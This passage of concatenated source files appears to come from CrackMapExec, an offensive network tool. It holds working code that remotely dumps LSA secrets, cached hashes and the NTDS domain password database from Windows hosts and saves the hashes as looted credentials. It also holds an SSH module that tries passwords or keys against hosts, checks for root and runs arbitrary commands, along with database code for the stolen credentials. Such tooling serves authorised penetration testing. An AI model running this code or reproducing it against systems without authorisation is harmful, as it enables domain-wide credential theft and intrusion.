self.remote_ops,
isRemote=True,
perSecretCallback=lambda secret_type, secret: add_lsa_secret(secret),
)
self.logger.success("Dumping LSA secrets")
LSA.dumpCachedHashes()
LSA.exportCached(self.output_filename)
LSA.dumpSecrets()
LSA.exportSecrets(self.output_filename)
self.logger.success(f"Dumped {highlight(add_lsa_secret.secrets)} LSA secrets to {self.output_filename + '.secrets'} and {self.output_filename + '.cached'}")
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(f"Error calling remote_ops.finish(): {e}")
LSA.finish()
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.getErrorString():
self.logger.fail("Error \"STATUS_ACCESS_DENIED\" while dumping LSA. This is likely due to an endpoint protection.")
except Exception as e:
self.logger.exception(str(e))
def ntds(self):
self.enable_remoteops()
use_vss_method = False
NTDSFileName = None
host_id = self.db.get_hosts(filter_term=self.host)[0][0]
def add_ntds_hash(ntds_hash, host_id):
add_ntds_hash.ntds_hashes += 1
if self.args.enabled:
if "Enabled" in ntds_hash:
ntds_hash = ntds_hash.split(" ")[0]
self.logger.highlight(ntds_hash)
else:
ntds_hash = ntds_hash.split(" ")[0]
self.logger.highlight(ntds_hash)
if ntds_hash.find("$") == -1:
if ntds_hash.find("\\") != -1:
domain, hash = ntds_hash.split("\\")
else:
domain = self.domain
hash = ntds_hash
try:
username, _, lmhash, nthash, _, _, _ = hash.split(":")
parsed_hash = ":".join((lmhash, nthash))
if validate_ntlm(parsed_hash):
self.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id)
add_ntds_hash.added_to_db += 1
return
raise
except:
self.logger.debug("Dumped hash is not NTLM, not adding to db for now ;)")
else:
self.logger.debug("Dumped hash is a computer account, not adding to db")
add_ntds_hash.ntds_hashes = 0
add_ntds_hash.added_to_db = 0
if self.remote_ops:
try:
if self.args.ntds == "vss":
NTDSFileName = self.remote_ops.saveNTDS()
use_vss_method = True
except Exception as e:
# if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# of enough privileges to access DRSUAPI.
# resumeFile = NTDS.getResumeSessionFile()
# if resumeFile is not None:
# os.unlink(resumeFile)
self.logger.fail(e)
NTDS = NTDSHashes(
NTDSFileName,
self.bootkey,
isRemote=True,
history=False,
noLMHash=True,
remoteOps=self.remote_ops,
useVSSMethod=use_vss_method,
justNTLM=True,
pwdLastSet=False,
resumeSession=None,
outputFileName=self.output_filename,
justUser=self.args.userntds if self.args.userntds else None,
printUserStatus=True,
perSecretCallback=lambda secret_type, secret: add_ntds_hash(secret, host_id),
)
try:
self.logger.success("Dumping the NTDS, this could take a while so go grab a redbull...")
NTDS.dump()
ntds_outfile = f"{self.output_filename}.ntds"
self.logger.success(f"Dumped {highlight(add_ntds_hash.ntds_hashes)} NTDS hashes to {ntds_outfile} of which {highlight(add_ntds_hash.added_to_db)} were added to the database")
self.logger.display("To extract only enabled accounts from the output file, run the following command: ")
self.logger.display(f"cat {ntds_outfile} | grep -iv disabled | cut -d ':' -f1")
self.logger.display(f"grep -iv disabled {ntds_outfile} | cut -d ':' -f1")
except Exception as e:
# if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# of enough privileges to access DRSUAPI.
# resumeFile = NTDS.getResumeSessionFile()
# if resumeFile is not None:
# os.unlink(resumeFile)
self.logger.fail(e)
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(f"Error calling remote_ops.finish(): {e}")
NTDS.finish()
================================================
FILE: cme/protocols/ssh/__init__.py
================================================
================================================
FILE: cme/protocols/ssh/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sqlalchemy.dialects.sqlite import Insert
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy import MetaData, Table, select, func, delete
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
import os
from pathlib import Path
import configparser
from cme.logger import cme_logger
from cme.paths import CME_PATH
# we can't import config.py due to a circular dependency, so we have to create redundant code unfortunately
cme_config = configparser.ConfigParser()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
cme_workspace = cme_config.get("CME", "workspace", fallback="default")
class database:
def __init__(self, db_engine):
self.CredentialsTable = None
self.HostsTable = None
self.LoggedinRelationsTable = None
self.AdminRelationsTable = None
self.KeysTable = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
self.sess = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute("""CREATE TABLE "credentials" (
"id" integer PRIMARY KEY,
"username" text,
"password" text,
"credtype" text
)""")
db_conn.execute("""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"host" text,
"port" integer,
"banner" text,
"os" text
)""")
db_conn.execute("""CREATE TABLE "loggedin_relations" (
"id" integer PRIMARY KEY,
"credid" integer,
"hostid" integer,
"shell" boolean,
FOREIGN KEY(credid) REFERENCES credentials(id),
FOREIGN KEY(hostid) REFERENCES hosts(id)
)""")
# "admin" access with SSH means we have root access, which implies shell access since we run commands to check
db_conn.execute("""CREATE TABLE "admin_relations" (
"id" integer PRIMARY KEY,
"credid" integer,
"hostid" integer,
FOREIGN KEY(credid) REFERENCES credentials(id),
FOREIGN KEY(hostid) REFERENCES hosts(id)
)""")
db_conn.execute("""CREATE TABLE "keys" (
"id" integer PRIMARY KEY,
"credid" integer,
"data" text,
FOREIGN KEY(credid) REFERENCES credentials(id)
)""")
def reflect_tables(self):
with self.db_engine.connect():
try:
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine)
self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine)
self.KeysTable = Table("keys", self.metadata, autoload_with=self.db_engine)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the CME {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.sess.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.sess.execute(table.delete())
def add_host(self, host, port, banner, os=None):
"""
Check if this host has already been added to the database, if not, add it in.
"""
hosts = []
updated_ids = []
q = select(self.HostsTable).filter(self.HostsTable.c.host == host)
results = self.sess.execute(q).all()
cme_logger.debug(f"add_host(): Initial hosts results: {results}")
# create new host
if not results:
new_host = {
"host": host,
"port": port,
"banner": banner if banner is not None else "",
"os": os if os is not None else "",
}
hosts = [new_host]
# update existing hosts data
else:
for host_result in results:
host_data = host_result._asdict()
cme_logger.debug(f"host: {host_result}")
cme_logger.debug(f"host_data: {host_data}")
# only update column if it is being passed in
if host is not None:
host_data["host"] = host
if port is not None:
host_data["port"] = port
if banner is not None:
host_data["banner"] = banner
if os is not None:
host_data["os"] = os
# only add host to be updated if it has changed
if host_data not in hosts:
hosts.append(host_data)
updated_ids.append(host_data["id"])
cme_logger.debug(f"Hosts: {hosts}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id)
update_columns = {col.name: col for col in q.excluded if col.name not in "id"}
q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)
self.sess.execute(q, hosts) # .scalar()
# we only return updated IDs for now - when RETURNING clause is allowed we can return inserted
if updated_ids:
cme_logger.debug(f"add_host() - Host IDs Updated: {updated_ids}")
return updated_ids
def add_credential(self, credtype, username, password, key=None):
"""
Check if this credential has already been added to the database, if not add it in.
"""
credentials = []
# a user can have multiple keys, all with passphrases, and a separate login password
if key is not None:
q = (
select(self.CredentialsTable)
.join(self.KeysTable)
.filter(
func.lower(self.CredentialsTable.c.username) == func.lower(username),
func.lower(self.CredentialsTable.c.credtype) == func.lower(credtype),
self.KeysTable.c.data == key,
)
)
results = self.sess.execute(q).all()
else:
q = select(self.CredentialsTable).filter(
func.lower(self.CredentialsTable.c.username) == func.lower(username),
func.lower(self.CredentialsTable.c.credtype) == func.lower(credtype),
)
results = self.sess.execute(q).all()
# add new credential
if not results:
new_cred = {
"credtype": credtype,
"username": username,
"password": password,
}
credentials = [new_cred]
# update existing cred data
else:
for creds in results:
# this will include the id, so we don't touch it
cred_data = creds._asdict()
# only update column if it is being passed in
if credtype is not None:
cred_data["credtype"] = credtype
if username is not None:
cred_data["username"] = username
if password is not None:
cred_data["password"] = password
# only add cred to be updated if it has changed
if cred_data not in credentials:
credentials.append(cred_data)
# TODO: find a way to abstract this away to a single Upsert call
q_users = Insert(self.CredentialsTable) # .returning(self.CredentialsTable.c.id)
update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"}
q_users = q_users.on_conflict_do_update(index_elements=self.CredentialsTable.primary_key, set_=update_columns_users)
cme_logger.debug(f"Adding credentials: {credentials}")
self.sess.execute(q_users, credentials) # .scalar()
# return cred_ids
# hacky way to get cred_id since we can't use returning() yet
if len(credentials) == 1:
cred_id = self.get_credential(credtype, username, password)
if key is not None:
self.add_key(cred_id, key)
return cred_id
else:
return credentials
def remove_credentials(self, creds_id):
"""
Removes a credential ID from the database
"""
del_hosts = []
for cred_id in creds_id:
q = delete(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id)
del_hosts.append(q)
self.sess.execute(q)
def add_key(self, cred_id, key):
# check if key relation already exists
check_q = self.sess.execute(select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id)).all()
cme_logger.debug(f"check_q: {check_q}")
if check_q:
cme_logger.debug(f"Key already exists for cred_id {cred_id}")
return
key_data = {"credid": cred_id, "data": key}
self.sess.execute(Insert(self.KeysTable), key_data)
key_id = self.sess.execute(select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id)).all()[0].id
cme_logger.debug(f"Key added: {key_id}")
return key_id
def get_keys(self, key_id=None, cred_id=None):
q = select(self.KeysTable)
if key_id is not None:
q = q.filter(self.KeysTable.c.id == key_id)
elif cred_id is not None:
q = q.filter(self.KeysTable.c.credid == cred_id)
results = self.sess.execute(q).all()
return results
def add_admin_user(self, credtype, username, secret, host_id=None, cred_id=None):
add_links = []
creds_q = select(self.CredentialsTable)
if cred_id:
creds_q = creds_q.filter(self.CredentialsTable.c.id == cred_id)
else:
creds_q = creds_q.filter(
func.lower(self.CredentialsTable.c.credtype) == func.lower(credtype),
func.lower(self.CredentialsTable.c.username) == func.lower(username),
self.CredentialsTable.c.password == secret,
)
creds = self.sess.execute(creds_q)
hosts = self.get_hosts(host_id)
if creds and hosts:
for cred, host in zip(creds, hosts):
cred_id = cred[0]
host_id = host[0]
link = {"credid": cred_id, "hostid": host_id}
admin_relations_select = select(self.AdminRelationsTable).filter(
self.AdminRelationsTable.c.credid == cred_id,
self.AdminRelationsTable.c.hostid == host_id,
)
links = self.sess.execute(admin_relations_select).all()
if not links:
add_links.append(link)
admin_relations_insert = Insert(self.AdminRelationsTable)
if add_links:
self.sess.execute(admin_relations_insert, add_links)
def get_admin_relations(self, cred_id=None, host_id=None):
if cred_id:
q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.credid == cred_id)
elif host_id:
q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)
else:
q = select(self.AdminRelationsTable)
results = self.sess.execute(q).all()
return results
def remove_admin_relation(self, cred_ids=None, host_ids=None):
q = delete(self.AdminRelationsTable)
if cred_ids:
for cred_id in cred_ids:
q = q.filter(self.AdminRelationsTable.c.credid == cred_id)
elif host_ids:
for host_id in host_ids:
q = q.filter(self.AdminRelationsTable.c.hostid == host_id)
self.sess.execute(q)
def is_credential_valid(self, credential_id):
"""
Check if this credential ID is valid.
"""
q = select(self.CredentialsTable).filter(
self.CredentialsTable.c.id == credential_id,
self.CredentialsTable.c.password is not None,
)
results = self.sess.execute(q).all()
return len(results) > 0
def get_credentials(self, filter_term=None, cred_type=None):
"""
Return credentials from the database.
"""
# if we're returning a single credential by ID
if self.is_credential_valid(filter_term):
q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == filter_term)
elif cred_type:
q = select(self.CredentialsTable).filter(self.CredentialsTable.c.credtype == cred_type)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username).like(like_term))
# otherwise return all credentials
else:
q = select(self.CredentialsTable)
results = self.sess.execute(q).all()
return results
def get_credential(self, cred_type, username, password):
q = select(self.CredentialsTable).filter(
self.CredentialsTable.c.username == username,
self.CredentialsTable.c.password == password,
self.CredentialsTable.c.credtype == cred_type,
)
results = self.sess.execute(q).first()
if results is None:
return None
else:
return results.id
def is_host_valid(self, host_id):
"""
Check if this host ID is valid.
"""
q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)
results = self.sess.execute(q).all()
return len(results) > 0
def get_hosts(self, filter_term=None):
"""
Return hosts from the database.
"""
q = select(self.HostsTable)
# if we're returning a single host by ID
if self.is_host_valid(filter_term):
q = q.filter(self.HostsTable.c.id == filter_term)
results = self.sess.execute(q).first()
# all() returns a list, so we keep the return format the same so consumers don't have to guess
return [results]
# if we're filtering by host
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = q.filter(self.HostsTable.c.host.like(like_term))
results = self.sess.execute(q).all()
cme_logger.debug(f"SSH get_hosts() - results: {results}")
return results
def is_user_valid(self, cred_id):
"""
Check if this User ID is valid.
"""
q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id)
results = self.sess.execute(q).all()
return len(results) > 0
def get_users(self, filter_term=None):
q = select(self.CredentialsTable)
if self.is_user_valid(filter_term):
q = q.filter(self.CredentialsTable.c.id == filter_term)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = q.filter(func.lower(self.CredentialsTable.c.username).like(like_term))
results = self.sess.execute(q).all()
return results
def get_user(self, domain, username):
q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username) == func.lower(username))
results = self.sess.execute(q).all()
return results
def add_loggedin_relation(self, cred_id, host_id, shell=False):
relation_query = select(self.LoggedinRelationsTable).filter(
self.LoggedinRelationsTable.c.credid == cred_id,
self.LoggedinRelationsTable.c.hostid == host_id,
)
results = self.sess.execute(relation_query).all()
# only add one if one doesn't already exist
if not results:
relation = {"credid": cred_id, "hostid": host_id, "shell": shell}
try:
cme_logger.debug(f"Inserting loggedin_relations: {relation}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)
self.sess.execute(q, [relation]) # .scalar()
inserted_id_results = self.get_loggedin_relations(cred_id, host_id)
cme_logger.debug(f"Checking if relation was added: {inserted_id_results}")
return inserted_id_results[0].id
except Exception as e:
cme_logger.debug(f"Error inserting LoggedinRelation: {e}")
def get_loggedin_relations(self, cred_id=None, host_id=None, shell=None):
q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)
if cred_id:
q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id)
if host_id:
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
if shell:
q = q.filter(self.LoggedinRelationsTable.c.shell == shell)
results = self.sess.execute(q).all()
return results
def remove_loggedin_relations(self, cred_id=None, host_id=None):
q = delete(self.LoggedinRelationsTable)
if cred_id:
q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id)
elif host_id:
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
self.sess.execute(q)
================================================
FILE: cme/protocols/ssh/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.cmedb import DatabaseNavigator, print_table, print_help
class navigator(DatabaseNavigator):
def display_creds(self, creds):
data = [
[
"CredID",
"Admin On",
"Total Logins",
"Total Shells",
"Username",
"Password",
"CredType",
]
]
for cred in creds:
cred_id = cred[0]
username = cred[1]
password = cred[2]
credtype = cred[3]
admin_links = self.db.get_admin_relations(cred_id=cred_id)
total_users = self.db.get_loggedin_relations(cred_id=cred_id)
total_shell = total_users = self.db.get_loggedin_relations(cred_id=cred_id, shell=True)
data.append(
[
cred_id,
str(len(admin_links)) + " Host(s)",
str(len(total_users)) + " Host(s)",
str(len(total_shell)) + " Shells(s)",
username,
password,
credtype,
]
)
print_table(data, title="Credentials")
# pull/545
def display_hosts(self, hosts):
data = [["HostID", "Admins", "Total Users", "Host", "Port", "Banner", "OS"]]
for h in hosts:
host_id = h[0]
host = h[1]
port = h[2]
banner = h[3]
os = h[4]
admin_users = self.db.get_admin_relations(host_id=host_id)
total_users = self.db.get_loggedin_relations(host_id=host_id)
data.append(
[
host_id,
str(len(admin_users)) + " Cred(s)",
str(len(total_users)) + " User(s)",
host,
port,
banner,
os,
]
)
print_table(data, title="Hosts")
def do_hosts(self, line):
filter_term = line.strip()
if filter_term == "":
hosts = self.db.get_hosts()
self.display_hosts(hosts)
else:
hosts = self.db.get_hosts(filter_term=filter_term)
if len(hosts) > 1:
self.display_hosts(hosts)
elif len(hosts) == 1:
data = [["HostID", "Host", "Port", "Banner", "OS"]]
host_id_list = []
for h in hosts:
host_id = h[0]
host_id_list.append(host_id)
host = h[1]
port = h[2]
banner = h[3]
os = h[4]
data.append([host_id, host, port, banner, os])
print_table(data, title="Host")
admin_access_data = [["CredID", "CredType", "UserName", "Password", "Shell"]]
nonadmin_access_data = [["CredID", "CredType", "UserName", "Password", "Shell"]]
for host_id in host_id_list:
admin_links = self.db.get_admin_relations(host_id=host_id)
nonadmin_links = self.db.get_loggedin_relations(host_id=host_id)
for link in admin_links:
link_id, cred_id, host_id = link
creds = self.db.get_credentials(filter_term=cred_id)
for cred in creds:
cred_id = cred[0]
username = cred[1]
password = cred[2]
credtype = cred[3]
shell = True
admin_access_data.append([cred_id, credtype, username, password, shell])
# probably a better way to do this without looping through and requesting them all again,
# but I just want to get this working for now
for link in nonadmin_links:
link_id, cred_id, host_id, shell = link
creds = self.db.get_credentials(filter_term=cred_id)
for cred in creds:
cred_id = cred[0]
username = cred[1]
password = cred[2]
credtype = cred[3]
shell = shell
cred_data = [cred_id, credtype, username, password, shell]
if cred_data not in admin_access_data:
nonadmin_access_data.append(cred_data)
if len(nonadmin_access_data) > 1:
print_table(
nonadmin_access_data,
title="Credential(s) with Non Admin Access",
)
if len(admin_access_data) > 1:
print_table(admin_access_data, title="Credential(s) with Admin Access")
def help_hosts(self):
help_string = """
hosts [filter_term]
By default prints all hosts
Table format:
| 'HostID', 'Host', 'Port', 'Banner', 'OS' |
"""
print_help(help_string)
def do_creds(self, line):
filter_term = line.strip()
if filter_term == "":
creds = self.db.get_credentials()
self.display_creds(creds)
# TODO
# elif filter_term.split()[0].lower() == "add":
# # add format: "domain username password
# args = filter_term.split()[1:]
#
# if len(args) == 3:
# domain, username, password = args
# if validate_ntlm(password):
# self.db.add_credential("hash", domain, username, password)
# else:
# self.db.add_credential("plaintext", domain, username, password)
# else:
# print("[!] Format is 'add username password")
# return
elif filter_term.split()[0].lower() == "remove":
args = filter_term.split()[1:]
if len(args) != 1:
print("[!] Format is 'remove '")
return
else:
self.db.remove_credentials(args)
self.db.remove_admin_relation(user_ids=args)
elif filter_term.split()[0].lower() == "plaintext":
creds = self.db.get_credentials(cred_type="plaintext")
self.display_creds(creds)
elif filter_term.split()[0].lower() == "key":
creds = self.db.get_credentials(cred_type="key")
self.display_creds(creds)
else:
creds = self.db.get_credentials(filter_term=filter_term)
if len(creds) != 1:
self.display_creds(creds)
elif len(creds) == 1:
cred_data = [["CredID", "UserName", "Password", "CredType"]]
cred_id_list = []
for cred in creds:
cred_id = cred[0]
cred_id_list.append(cred_id)
username = cred[1]
password = cred[2]
credtype = cred[3]
cred_data.append([cred_id, username, password, credtype])
print_table(cred_data, title="Credential(s)")
admin_access_data = [["HostID", "Host", "Port", "Banner", "OS", "Shell"]]
nonadmin_access_data = [["HostID", "Host", "Port", "Banner", "OS", "Shell"]]
for cred_id in cred_id_list:
admin_links = self.db.get_admin_relations(cred_id=cred_id)
nonadmin_links = self.db.get_loggedin_relations(cred_id=cred_id)
for link in admin_links:
link_id, cred_id, host_id = link
hosts = self.db.get_hosts(host_id)
for h in hosts:
host_id = h[0]
host = h[1]
port = h[2]
banner = h[3]
os = h[4]
shell = True # if we have root via SSH, we know it's a shell
admin_access_data.append([host_id, host, port, banner, os, shell])
# probably a better way to do this without looping through and requesting them all again,
# but I just want to get this working for now
for link in nonadmin_links:
link_id, cred_id, host_id, shell = link
hosts = self.db.get_hosts(host_id)
for h in hosts:
host_id = h[0]
host = h[1]
port = h[2]
banner = h[3]
os = h[4]
host_data = [host_id, host, port, banner, os, shell]
if host_data not in admin_access_data:
nonadmin_access_data.append(host_data)
# we look if it's greater than one because the header row always exists
if len(nonadmin_access_data) > 1:
print_table(nonadmin_access_data, title="Non-Admin Access to Host(s)")
if len(admin_access_data) > 1:
print_table(admin_access_data, title="Admin Access to Host(s)")
def help_creds(self):
help_string = """
creds [add|remove|plaintext|key|filter_term]
By default prints all creds
Table format:
| 'CredID', 'Admin On', 'CredType', 'UserName', 'Password', 'Key' (if key type) |
Subcommands:
add - format: "add username password "
remove - format: "remove "
plaintext - prints plaintext creds
key - prints ssh key creds
filter_term - filters creds with filter_term
If a single credential is returned (e.g. `creds 15`, it prints the following tables:
Credential(s) | 'CredID', 'CredType', 'UserName', 'Password', 'Key' |
Admin Access to Host(s) | 'HostID', 'Host', 'OS', 'Banner'
Otherwise, it prints the default credential table from a `like` query on the `username` column
"""
print_help(help_string)
def display_keys(self, keys):
data = [["Key ID", "Cred ID", "Key Data"]]
for key in keys:
data.append([key[0], key[1], key[2]])
print_table(data, "Keys")
def do_keys(self, line):
filter_term = line.strip()
if filter_term == "":
keys = self.db.get_keys()
self.display_keys(keys)
elif filter_term == "cred_id":
cred_id = filter_term.split()[1]
keys = self.db.get_keys(cred_id=cred_id)
self.display_keys(keys)
else:
key_id = filter_term
keys = self.db.get_keys(key_id=key_id)
self.display_keys(keys)
def help_keys(self):
help_string = """
list SSH keys
keys [id]
"""
print_help(help_string)
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you" " want to run this? (y/n): ") == "y":
self.db.clear_database()
def help_clear_database(self):
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
@staticmethod
def complete_hosts(self, text, line):
"""
Tab-complete 'hosts' commands.
"""
commands = ["add", "remove"]
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def complete_creds(self, text, line):
"""
Tab-complete 'creds' commands.
"""
commands = ["add", "remove", "key", "plaintext"]
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
================================================
FILE: cme/protocols/ssh/proto_args.py
================================================
def proto_args(parser, std_parser, module_parser):
ssh_parser = parser.add_parser("ssh", help="own stuff using SSH", parents=[std_parser, module_parser])
ssh_parser.add_argument("--key-file", type=str, help="Authenticate using the specified private key. Treats the password parameter as the key's passphrase.")
ssh_parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)")
cgroup = ssh_parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output")
cgroup.add_argument("-x", metavar="COMMAND", dest="execute", help="execute the specified command")
cgroup.add_argument("--remote-enum", action="store_true", help="executes remote commands for enumeration")
return parser
================================================
FILE: cme/protocols/ssh.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from io import StringIO
import paramiko
from cme.config import process_secret
from cme.connection import *
from cme.logger import CMEAdapter
from paramiko.ssh_exception import (
AuthenticationException,
NoValidConnectionsError,
SSHException,
)
class ssh(connection):
def __init__(self, args, db, host):
self.protocol = "SSH"
self.remote_version = None
self.server_os = None
super().__init__(args, db, host)
def proto_logger(self):
self.logger = CMEAdapter(
extra={
"protocol": "SSH",
"host": self.host,
"port": self.args.port,
"hostname": self.hostname,
}
)
logging.getLogger("paramiko").setLevel(logging.WARNING)
def print_host_info(self):
self.logger.display(self.remote_version)
return True
def enum_host_info(self):
self.remote_version = self.conn._transport.remote_version
self.logger.debug(f"Remote version: {self.remote_version}")
self.server_os = ""
if self.args.remote_enum:
stdin, stdout, stderr = self.conn.exec_command("uname -r")
self.server_os = stdout.read().decode("utf-8")
self.logger.debug(f"OS retrieved: {self.server_os}")
self.db.add_host(self.host, self.args.port, self.remote_version, os=self.server_os)
def create_conn_obj(self):
self.conn = paramiko.SSHClient()
self.conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
self.conn.connect(self.host, port=self.args.port)
except AuthenticationException:
return True
except SSHException:
return True
except NoValidConnectionsError:
return False
except socket.error:
return False
def client_close(self):
self.conn.close()
def check_if_admin(self):
# we could add in another method to check by piping in the password to sudo
# but that might be too much of an opsec concern - maybe add in a flag to do more checks?
stdin, stdout, stderr = self.conn.exec_command("id")
if stdout.read().decode("utf-8").find("uid=0(root)") != -1:
self.logger.info(f"Determined user is root via `id` command")
self.admin_privs = True
return True
stdin, stdout, stderr = self.conn.exec_command("sudo -ln | grep 'NOPASSWD: ALL'")
if stdout.read().decode("utf-8").find("NOPASSWD: ALL") != -1:
self.logger.info(f"Determined user is root via `sudo -ln` command")
self.admin_privs = True
return True
def plaintext_login(self, username, password, private_key=None):
try:
if self.args.key_file or private_key:
if private_key:
pkey = paramiko.RSAKey.from_private_key(StringIO(private_key))
else:
pkey = paramiko.RSAKey.from_private_key_file(self.args.key_file)
self.logger.debug(f"Logging in with key")
self.conn.connect(
self.host,
port=self.args.port,
username=username,
passphrase=password if password != "" else None,
pkey=pkey,
look_for_keys=False,
allow_agent=False,
)
if private_key:
cred_id = self.db.add_credential(
"key",
username,
password if password != "" else "",
key=private_key,
)
else:
with open(self.args.key_file, "r") as f:
key_data = f.read()
cred_id = self.db.add_credential(
"key",
username,
password if password != "" else "",
key=key_data,
)
else:
self.logger.debug(f"Logging in with password")
self.conn.connect(
self.host,
port=self.args.port,
username=username,
password=password,
look_for_keys=False,
allow_agent=False,
)
cred_id = self.db.add_credential("plaintext", username, password)
shell_access = False
host_id = self.db.get_hosts(self.host)[0].id
if self.check_if_admin():
shell_access = True
self.logger.debug(f"User {username} logged in successfully and is root!")
if self.args.key_file:
self.db.add_admin_user("key", username, password, host_id=host_id, cred_id=cred_id)
else:
self.db.add_admin_user(
"plaintext",
username,
password,
host_id=host_id,
cred_id=cred_id,
)
else:
stdin, stdout, stderr = self.conn.exec_command("id")
output = stdout.read().decode("utf-8")
if not output:
self.logger.debug(f"User cannot get a shell")
shell_access = False
else:
shell_access = True
self.db.add_loggedin_relation(cred_id, host_id, shell=shell_access)
if self.args.key_file:
password = f"{password} (keyfile: {self.args.key_file})"
display_shell_access = f" - shell access!" if shell_access else ""
self.logger.success(f"{username}:{process_secret(password)} {self.mark_pwned()}{highlight(display_shell_access)}")
return True
except (
AuthenticationException,
NoValidConnectionsError,
ConnectionResetError,
) as e:
self.logger.fail(f"{username}:{process_secret(password)} {e}")
self.client_close()
return False
except Exception as e:
self.logger.exception(e)
self.client_close()
return False
def execute(self, payload=None, output=False):
try:
command = payload if payload is not None else self.args.execute
stdin, stdout, stderr = self.conn.exec_command(command)
except AttributeError:
return ""
if output:
self.logger.success("Executed command")
for line in stdout:
self.logger.highlight(line.strip())
return stdout
================================================
FILE: cme/protocols/vnc/__init__.py
================================================
================================================
FILE: cme/protocols/vnc/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from sqlalchemy import MetaData, Table
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.exc import SAWarning
import warnings
from cme.logger import cme_logger
# if there is an issue with SQLAlchemy and a connection cannot be cleaned up properly it spews out annoying warnings
warnings.filterwarnings("ignore", category=SAWarning)
class database:
def __init__(self, db_engine):
self.HostsTable = None
self.CredentialsTable = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
# this is still named "conn" when it is the session object; TODO: rename
self.conn = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute(
"""CREATE TABLE "credentials" (
"id" integer PRIMARY KEY,
"username" text,
"password" text,
"pkey" text
)"""
)
db_conn.execute(
"""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"ip" text,
"hostname" text,
"port" integer,
"server_banner" text
)"""
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
try:
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
